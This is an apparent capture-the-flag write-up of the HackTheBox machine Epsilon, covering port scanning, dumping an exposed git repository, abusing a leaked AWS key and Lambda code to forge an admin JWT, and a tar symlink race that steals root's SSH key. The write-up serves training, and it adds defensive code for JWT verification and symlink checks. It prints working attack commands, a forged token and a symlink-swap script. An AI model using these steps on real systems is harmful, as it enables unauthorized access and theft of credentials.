Port scanning

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ sudo nmap --min-rate=10000 -p- 10.10.11.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 23:25 CST
Nmap scan report for 10.10.11.134
Host is up (0.071s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp

Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds
┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ sudo nmap -sT -sV -sC -O -p80 22,80,5000 10.10.11.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 23:27 CST
Failed to resolve "22,80,5000".
Nmap scan report for 10.10.11.134
Host is up (0.069s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ sudo nmap -sT -sV -sC -O -p22,80,5000 10.10.11.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-04 23:28 CST
Nmap scan report for 10.10.11.134
Host is up (0.069s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-git:
| 10.10.11.134:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Updating Tracking API # Please enter the commit message for...
|_http-title: 403 Forbidden
5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
|_http-title: Costume Shop
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.07 seconds

Web

Port 80 exposes a .git directory; gitdumper from GitTools pulls the source.

┌──(mikannse㉿kali)-[~/tools/web/GitTools/Dumper]
└─$ ./gitdumper.sh http://10.10.11.134/.git/ ~/HTB/Epsilon/repo
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating /home/mikannse/HTB/Epsilon/repo/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
<SNIP>

Then use extractor to recover the commit history.

┌──(mikannse㉿kali)-[~/tools/web/GitTools/Extractor]
└─$ ./extractor.sh ~/HTB/Epsilon/repo ~/HTB/Epsilon/repo_
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
<SNIP>

There are five commits in total and two Python scripts, which can reasonably be assumed to be the source of the service on port 5000. There also seem to be credentials in there: the commit prefixed 2- leaks an AWS key.

server.py is a Flask service. admin:admin passes the login check, but when tried there was no redirect. Looking at the /home route, the reason is a missing auth cookie: a JWT signed with the value of secret. track-api.py is a script that uses boto3 to talk to the Lambda service.

What is boto3?

boto3 is the official Amazon Web Services (AWS) SDK (software development kit) for Python. It provides a high-level interface for interacting with AWS services and supports almost all of them, including S3, EC2, RDS and DynamoDB. The main features of boto3 include:

What is AWS Lambda?

AWS Lambda is a serverless compute service that lets developers run code without provisioning or managing servers. Lambda handles all the operational work automatically, including capacity planning, load balancing, monitoring and logging. With Lambda, you can focus on writing code and let AWS manage the infrastructure.

First run aws configure locally and enter the leaked key and configuration; after that the Lambda functions can be listed.

┌──(mikannse㉿kali)-[~]
└─$ aws --endpoint-url=http://cloud.epsilon.htb lambda list-functions
{
"Functions": [
<SNIP>

There is only one function, called costume_shop_v1.

┌──(mikannse㉿kali)-[~]
└─$ aws --endpoint-url=http://cloud.epsilon.htb lambda get-function --function-name=costume_shop_v1
{
<SNIP>
"Code": {
"Location": "http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code"
},
"Tags": {}
}

This gives the download location for the function's code.

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ wget http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ file code
code: Zip archive data, at least v2.0 to extract, compression method=deflate

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ unzip code
Archive: code
inflating: lambda_function.py

The important part is that we get the secret, which is presumably the same secret used in server.py, so a JWT can be forged.

┌──(mikannse㉿kali)-[~/HTB/Epsilon]
└─$ python
Python 3.11.9 (main, Apr 10 2024, 13:16:36) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import jwt
>>> jwt.encode({"username":"admin"},key='RrXCv`mrNe!K!4+5`wYq',algorithm='HS256')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.WFYEm2-bZZxe2qpoAtRPBaoNekx-oOwueA80zzb3Rc4'

Manually add a cookie named "auth" in the browser, then log in as admin:admin; the /home route is now accessible.
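To show what the server side of this check looks like, and why the leaked secret is decisive, here is a verifier for the auth cookie written for this writeup in stdlib Python (not the box's server.py; the secret and token are the ones shown above). A token signed with the leaked secret is indistinguishable from one the application issued, so pinning the algorithm and comparing in constant time still cannot help once the key is public; the only fix is rotating the secret and keeping it out of the code.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed for this example: the secret and the forged token shown above.
SECRET = 'RrXCv`mrNe!K!4+5`wYq'
PAGE_TOKEN = ('eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.'
              'eyJ1c2VybmFtZSI6ImFkbWluIn0.'
              'WFYEm2-bZZxe2qpoAtRPBaoNekx-oOwueA80zzb3Rc4')


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + '=' * (-len(segment) % 4))


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the claims if `token` is a valid HS256 JWT under `secret`, else None.

    The algorithm is pinned (so 'alg: none' is rejected), the signature is
    checked in constant time, and the payload is parsed only after that.
    """
    try:
        header_b64, payload_b64, sig_b64 = token.split('.')
        header = json.loads(_b64url_decode(header_b64))
        if header.get('alg') != 'HS256':
            return None
        signing_input = f'{header_b64}.{payload_b64}'.encode()
        expected = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        return json.loads(_b64url_decode(payload_b64))
    except (ValueError, UnicodeDecodeError, AttributeError):
        return None


def is_admin(token: str, secret: str) -> bool:
    """What a /home handler would check before granting admin access."""
    claims = verify_hs256(token, secret)
    return claims is not None and claims.get('username') == 'admin'
```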

According to the source, the /order route has an SSTI; intercept the request, modify the costume parameter and submit it to get a reverse shell.

Privilege escalation

Upload pspy; a process running as root executes the backup script /bin/bash /usr/bin/backup.sh

#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*

Classic tar -cvf: at first glance this looks like the checkpoint trick, but trying it, it does not work. Misjudged: that trick depends on a wildcard expanding attacker-named files into tar's arguments, and this script passes the literal path /var/www/app/.

Looking at a walkthrough: the reason is tar's -h flag, which follows symlinks and archives their targets. So the contents of /opt/backups/checksum can be swapped for whichever file we want to read, which can be done with this bash script

#!/bin/sh

if [ -e /opt/backups/checksum ]; then
rm -f /opt/backups/checksum
echo '[+] Checksum file removed'
ln -sf /root/.ssh/id_rsa /opt/backups/checksum
echo '[+] Symlink placed'
fi
while true; do ./hack.sh; done

Wait for the output, then wait a while for the next run of the backup; then go to /var/backups/web_backups/, pick the newest archive and unpack it to obtain root's SSH private key.
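The whole privesc rests on one flag: with -h, tar follows the symlink and stores the target's bytes; without it, the archive only records the link. The example below (added for this writeup, not part of the box) reproduces that difference with Python's tarfile module, whose dereference option mirrors GNU tar -h, on a constructed staging directory that plays the role of /opt/backups, and adds the pre-flight check a hardened backup job should run before archiving anything from a directory other users can write to.

```python
import os
import tarfile
import tempfile
from typing import Tuple

SECRET_CONTENT = b'PLACEHOLDER-PRIVATE-KEY'  # stands in for /root/.ssh/id_rsa


def _stage(root: str) -> str:
    """Constructed layout: a staging dir whose 'checksum' is a symlink to a secret file."""
    secret = os.path.join(root, 'secret.txt')
    with open(secret, 'wb') as f:
        f.write(SECRET_CONTENT)
    staging = os.path.join(root, 'backups')  # plays the role of /opt/backups
    os.mkdir(staging)
    os.symlink(secret, os.path.join(staging, 'checksum'))
    return staging


def has_symlinks(path: str) -> bool:
    """Pre-flight check: refuse to archive a staging dir that contains any symlink."""
    for dirpath, dirnames, filenames in os.walk(path):
        for name in dirnames + filenames:
            if os.path.islink(os.path.join(dirpath, name)):
                return True
    return False


def archive_checksum(dereference: bool) -> Tuple[str, bytes]:
    """Archive staging/checksum with (tar -h) or without link dereferencing.

    Returns (member kind, bytes stored in the archive for that member).
    """
    with tempfile.TemporaryDirectory() as root:
        staging = _stage(root)
        out = os.path.join(root, 'web_backup.tar')
        with tarfile.open(out, 'w', dereference=dereference) as tar:
            tar.add(os.path.join(staging, 'checksum'), arcname='checksum')
        with tarfile.open(out) as tar:
            member = tar.getmember('checksum')
            if member.issym():
                return 'symlink', b''          # only the link itself was stored
            return 'file', tar.extractfile(member).read()  # target bytes leaked


def staged_dir_has_symlinks() -> bool:
    with tempfile.TemporaryDirectory() as root:
        return has_symlinks(_stage(root))
```

Dropping -h (or never letting the web user write the staging directory) is what closes this; the check alone is a safety net, since the symlink can still be planted between the check and the tar run.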

Closing thoughts

This box is really great: from the AWS Lambda service to JWT forgery to SSTI, the test points are all good. The tar -h flag at the end was the first time I'd run into it.